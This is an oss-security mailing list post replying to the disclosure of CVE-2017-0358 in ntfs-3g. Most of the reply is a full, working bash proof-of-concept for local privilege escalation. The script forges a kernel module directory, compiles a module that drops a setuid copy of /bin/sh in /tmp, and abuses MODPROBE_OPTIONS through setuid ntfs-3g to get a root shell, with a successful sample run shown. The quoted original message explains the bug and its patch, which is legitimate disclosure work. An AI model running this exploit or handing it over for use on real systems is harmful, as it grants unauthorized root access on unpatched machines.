oss-sec mailing list archives
Re: CVE-2017-0358 ntfs-3g: modprobe influence vulnerability via environment variables
From: Kristian Erik Hermansen <kristian.hermansen () gmail com>
Date: Fri, 3 Feb 2017 23:14:16 -0800
#!/bin/bash echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @" echo "@ ntfs-3g local privilege escalation to root @" echo "@ Credits to Google Project Zero @" echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @" echo "@ Tested: Debian 9 (Stretch) @" echo "@ Date: 2017-02-03 @" echo "@ Link: https://goo.gl/A9I8Vq @" echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" echo "[*] Gathering environment info ..." cwd="$(pwd)" un="$(uname -r)" dlm="$(pwd)/lib/modules" dkf="$(pwd)/kernel/fs" echo "[*] Creating kernel hijack directories ..." mkdir -p "${dlm}" mkdir -p "${dkf}" echo "[*] Forging symlinks ..." ln -sf "${cwd}" "${dlm}/${un}" ln -sf "${cwd}" "${dkf}/fuse" ln -sf cve_2017_0358.ko fuse.ko echo "[*] Pulling in deps ... " echo "[*] Building kernel module ... " cat << 'EOF' > cve_2017_0358.c #include <linux/module.h> MODULE_LICENSE("CC"); MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358 () gmail com>"); MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero"); int init_module(void) { printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n"); char *envp[] = { "HOME=/tmp", NULL }; char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL }; call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL }; call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC); return 0; } void cleanup_module(void) { printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n"); } EOF cat << 'EOF' > Makefile obj-m += cve_2017_0358.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean EOF make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools" cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?" MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null /tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)" /tmp/r00t echo << 'EOF' $ whoami user $ ./cve-2017-0358.sh @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ CVE-2017-0359, PoC by Kristian Erik Hermansen @ @ ntfs-3g local privilege escalation to root @ @ Credits to Google Project Zero @ @ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @ @ Tested: Debian 9 (Stretch) @ @ Date: 2017-02-03 @ @ Link: https://goo.gl/A9I8Vq @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ [*] Gathering environment info ... [*] Creating kernel hijack directories ... [*] Forging symlinks ... [*] Pulling in deps ... [*] Building kernel module ... [+] SUCCESS: You have root. Don't be evil :) # whoami root EOF On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS) <gcs () debian org> wrote:
Hi, Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write NTFS driver for FUSE does not not scrub the environment before executing modprobe to load the fuse module. This influence the behavior of modprobe (MODPROBE_OPTIONS environment variable, --config and --dirname options) potentially allowing for local root privilege escalation if ntfs-3g is installed setuid. This is the case for Debian, Ubuntu and probably Gentoo. This problem is in the source since 2008, maybe before. The fix is easy, use execle instead of execl and pass NULL as environment variables. -- cut -- --- ntfs-3g/src/lowntfs-3g.c.ref 2016-12-31 08:56:59.011749600 +0100 +++ ntfs-3g/src/lowntfs-3g.c 2017-01-05 14:41:52.041473700 +0100 @@ -4291,13 +4291,14 @@ struct stat st; pid_t pid; const char *cmd = "/sbin/modprobe"; + char *env = (char*)NULL; struct timespec req = { 0, 100000000 }; /* 100 msec */ fuse_fstype fstype; if (!stat(cmd, &st) && !geteuid()) { pid = fork(); if (!pid) { - execl(cmd, cmd, "fuse", NULL); + execle(cmd, cmd, "fuse", NULL, &env); _exit(1); } else if (pid != -1) waitpid(pid, NULL, 0); --- ntfs-3g/src/ntfs-3g.c.ref 2016-12-31 08:56:59.022518700 +0100 +++ ntfs-3g/src/ntfs-3g.c 2017-01-05 15:45:45.912499400 +0100 @@ -3885,13 +3885,14 @@ struct stat st; pid_t pid; const char *cmd = "/sbin/modprobe"; + char *env = (char*)NULL; struct timespec req = { 0, 100000000 }; /* 100 msec */ fuse_fstype fstype; if (!stat(cmd, &st) && !geteuid()) { pid = fork(); if (!pid) { - execl(cmd, cmd, "fuse", NULL); + execle(cmd, cmd, "fuse", NULL, &env); _exit(1); } else if (pid != -1) waitpid(pid, NULL, 0); -- cut -- CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso, Debian Security Team. Regards, Laszlo/GCS
-- Regards, Kristian Erik Hermansen https://www.linkedin.com/in/kristianhermansen https://profiles.google.com/kristianerikhermansen
Attachment:
cve-2017-0358.sh.txt
Description:
Current thread:
- CVE-2017-0358 ntfs-3g: modprobe influence vulnerability via environment variables Laszlo Boszormenyi (GCS) (Feb 01)
- Re: CVE-2017-0358 ntfs-3g: modprobe influence vulnerability via environment variables Agostino Sarubbo (Feb 01)
- Re: CVE-2017-0358 ntfs-3g: modprobe influence vulnerability via environment variables Kristian Erik Hermansen (Feb 03)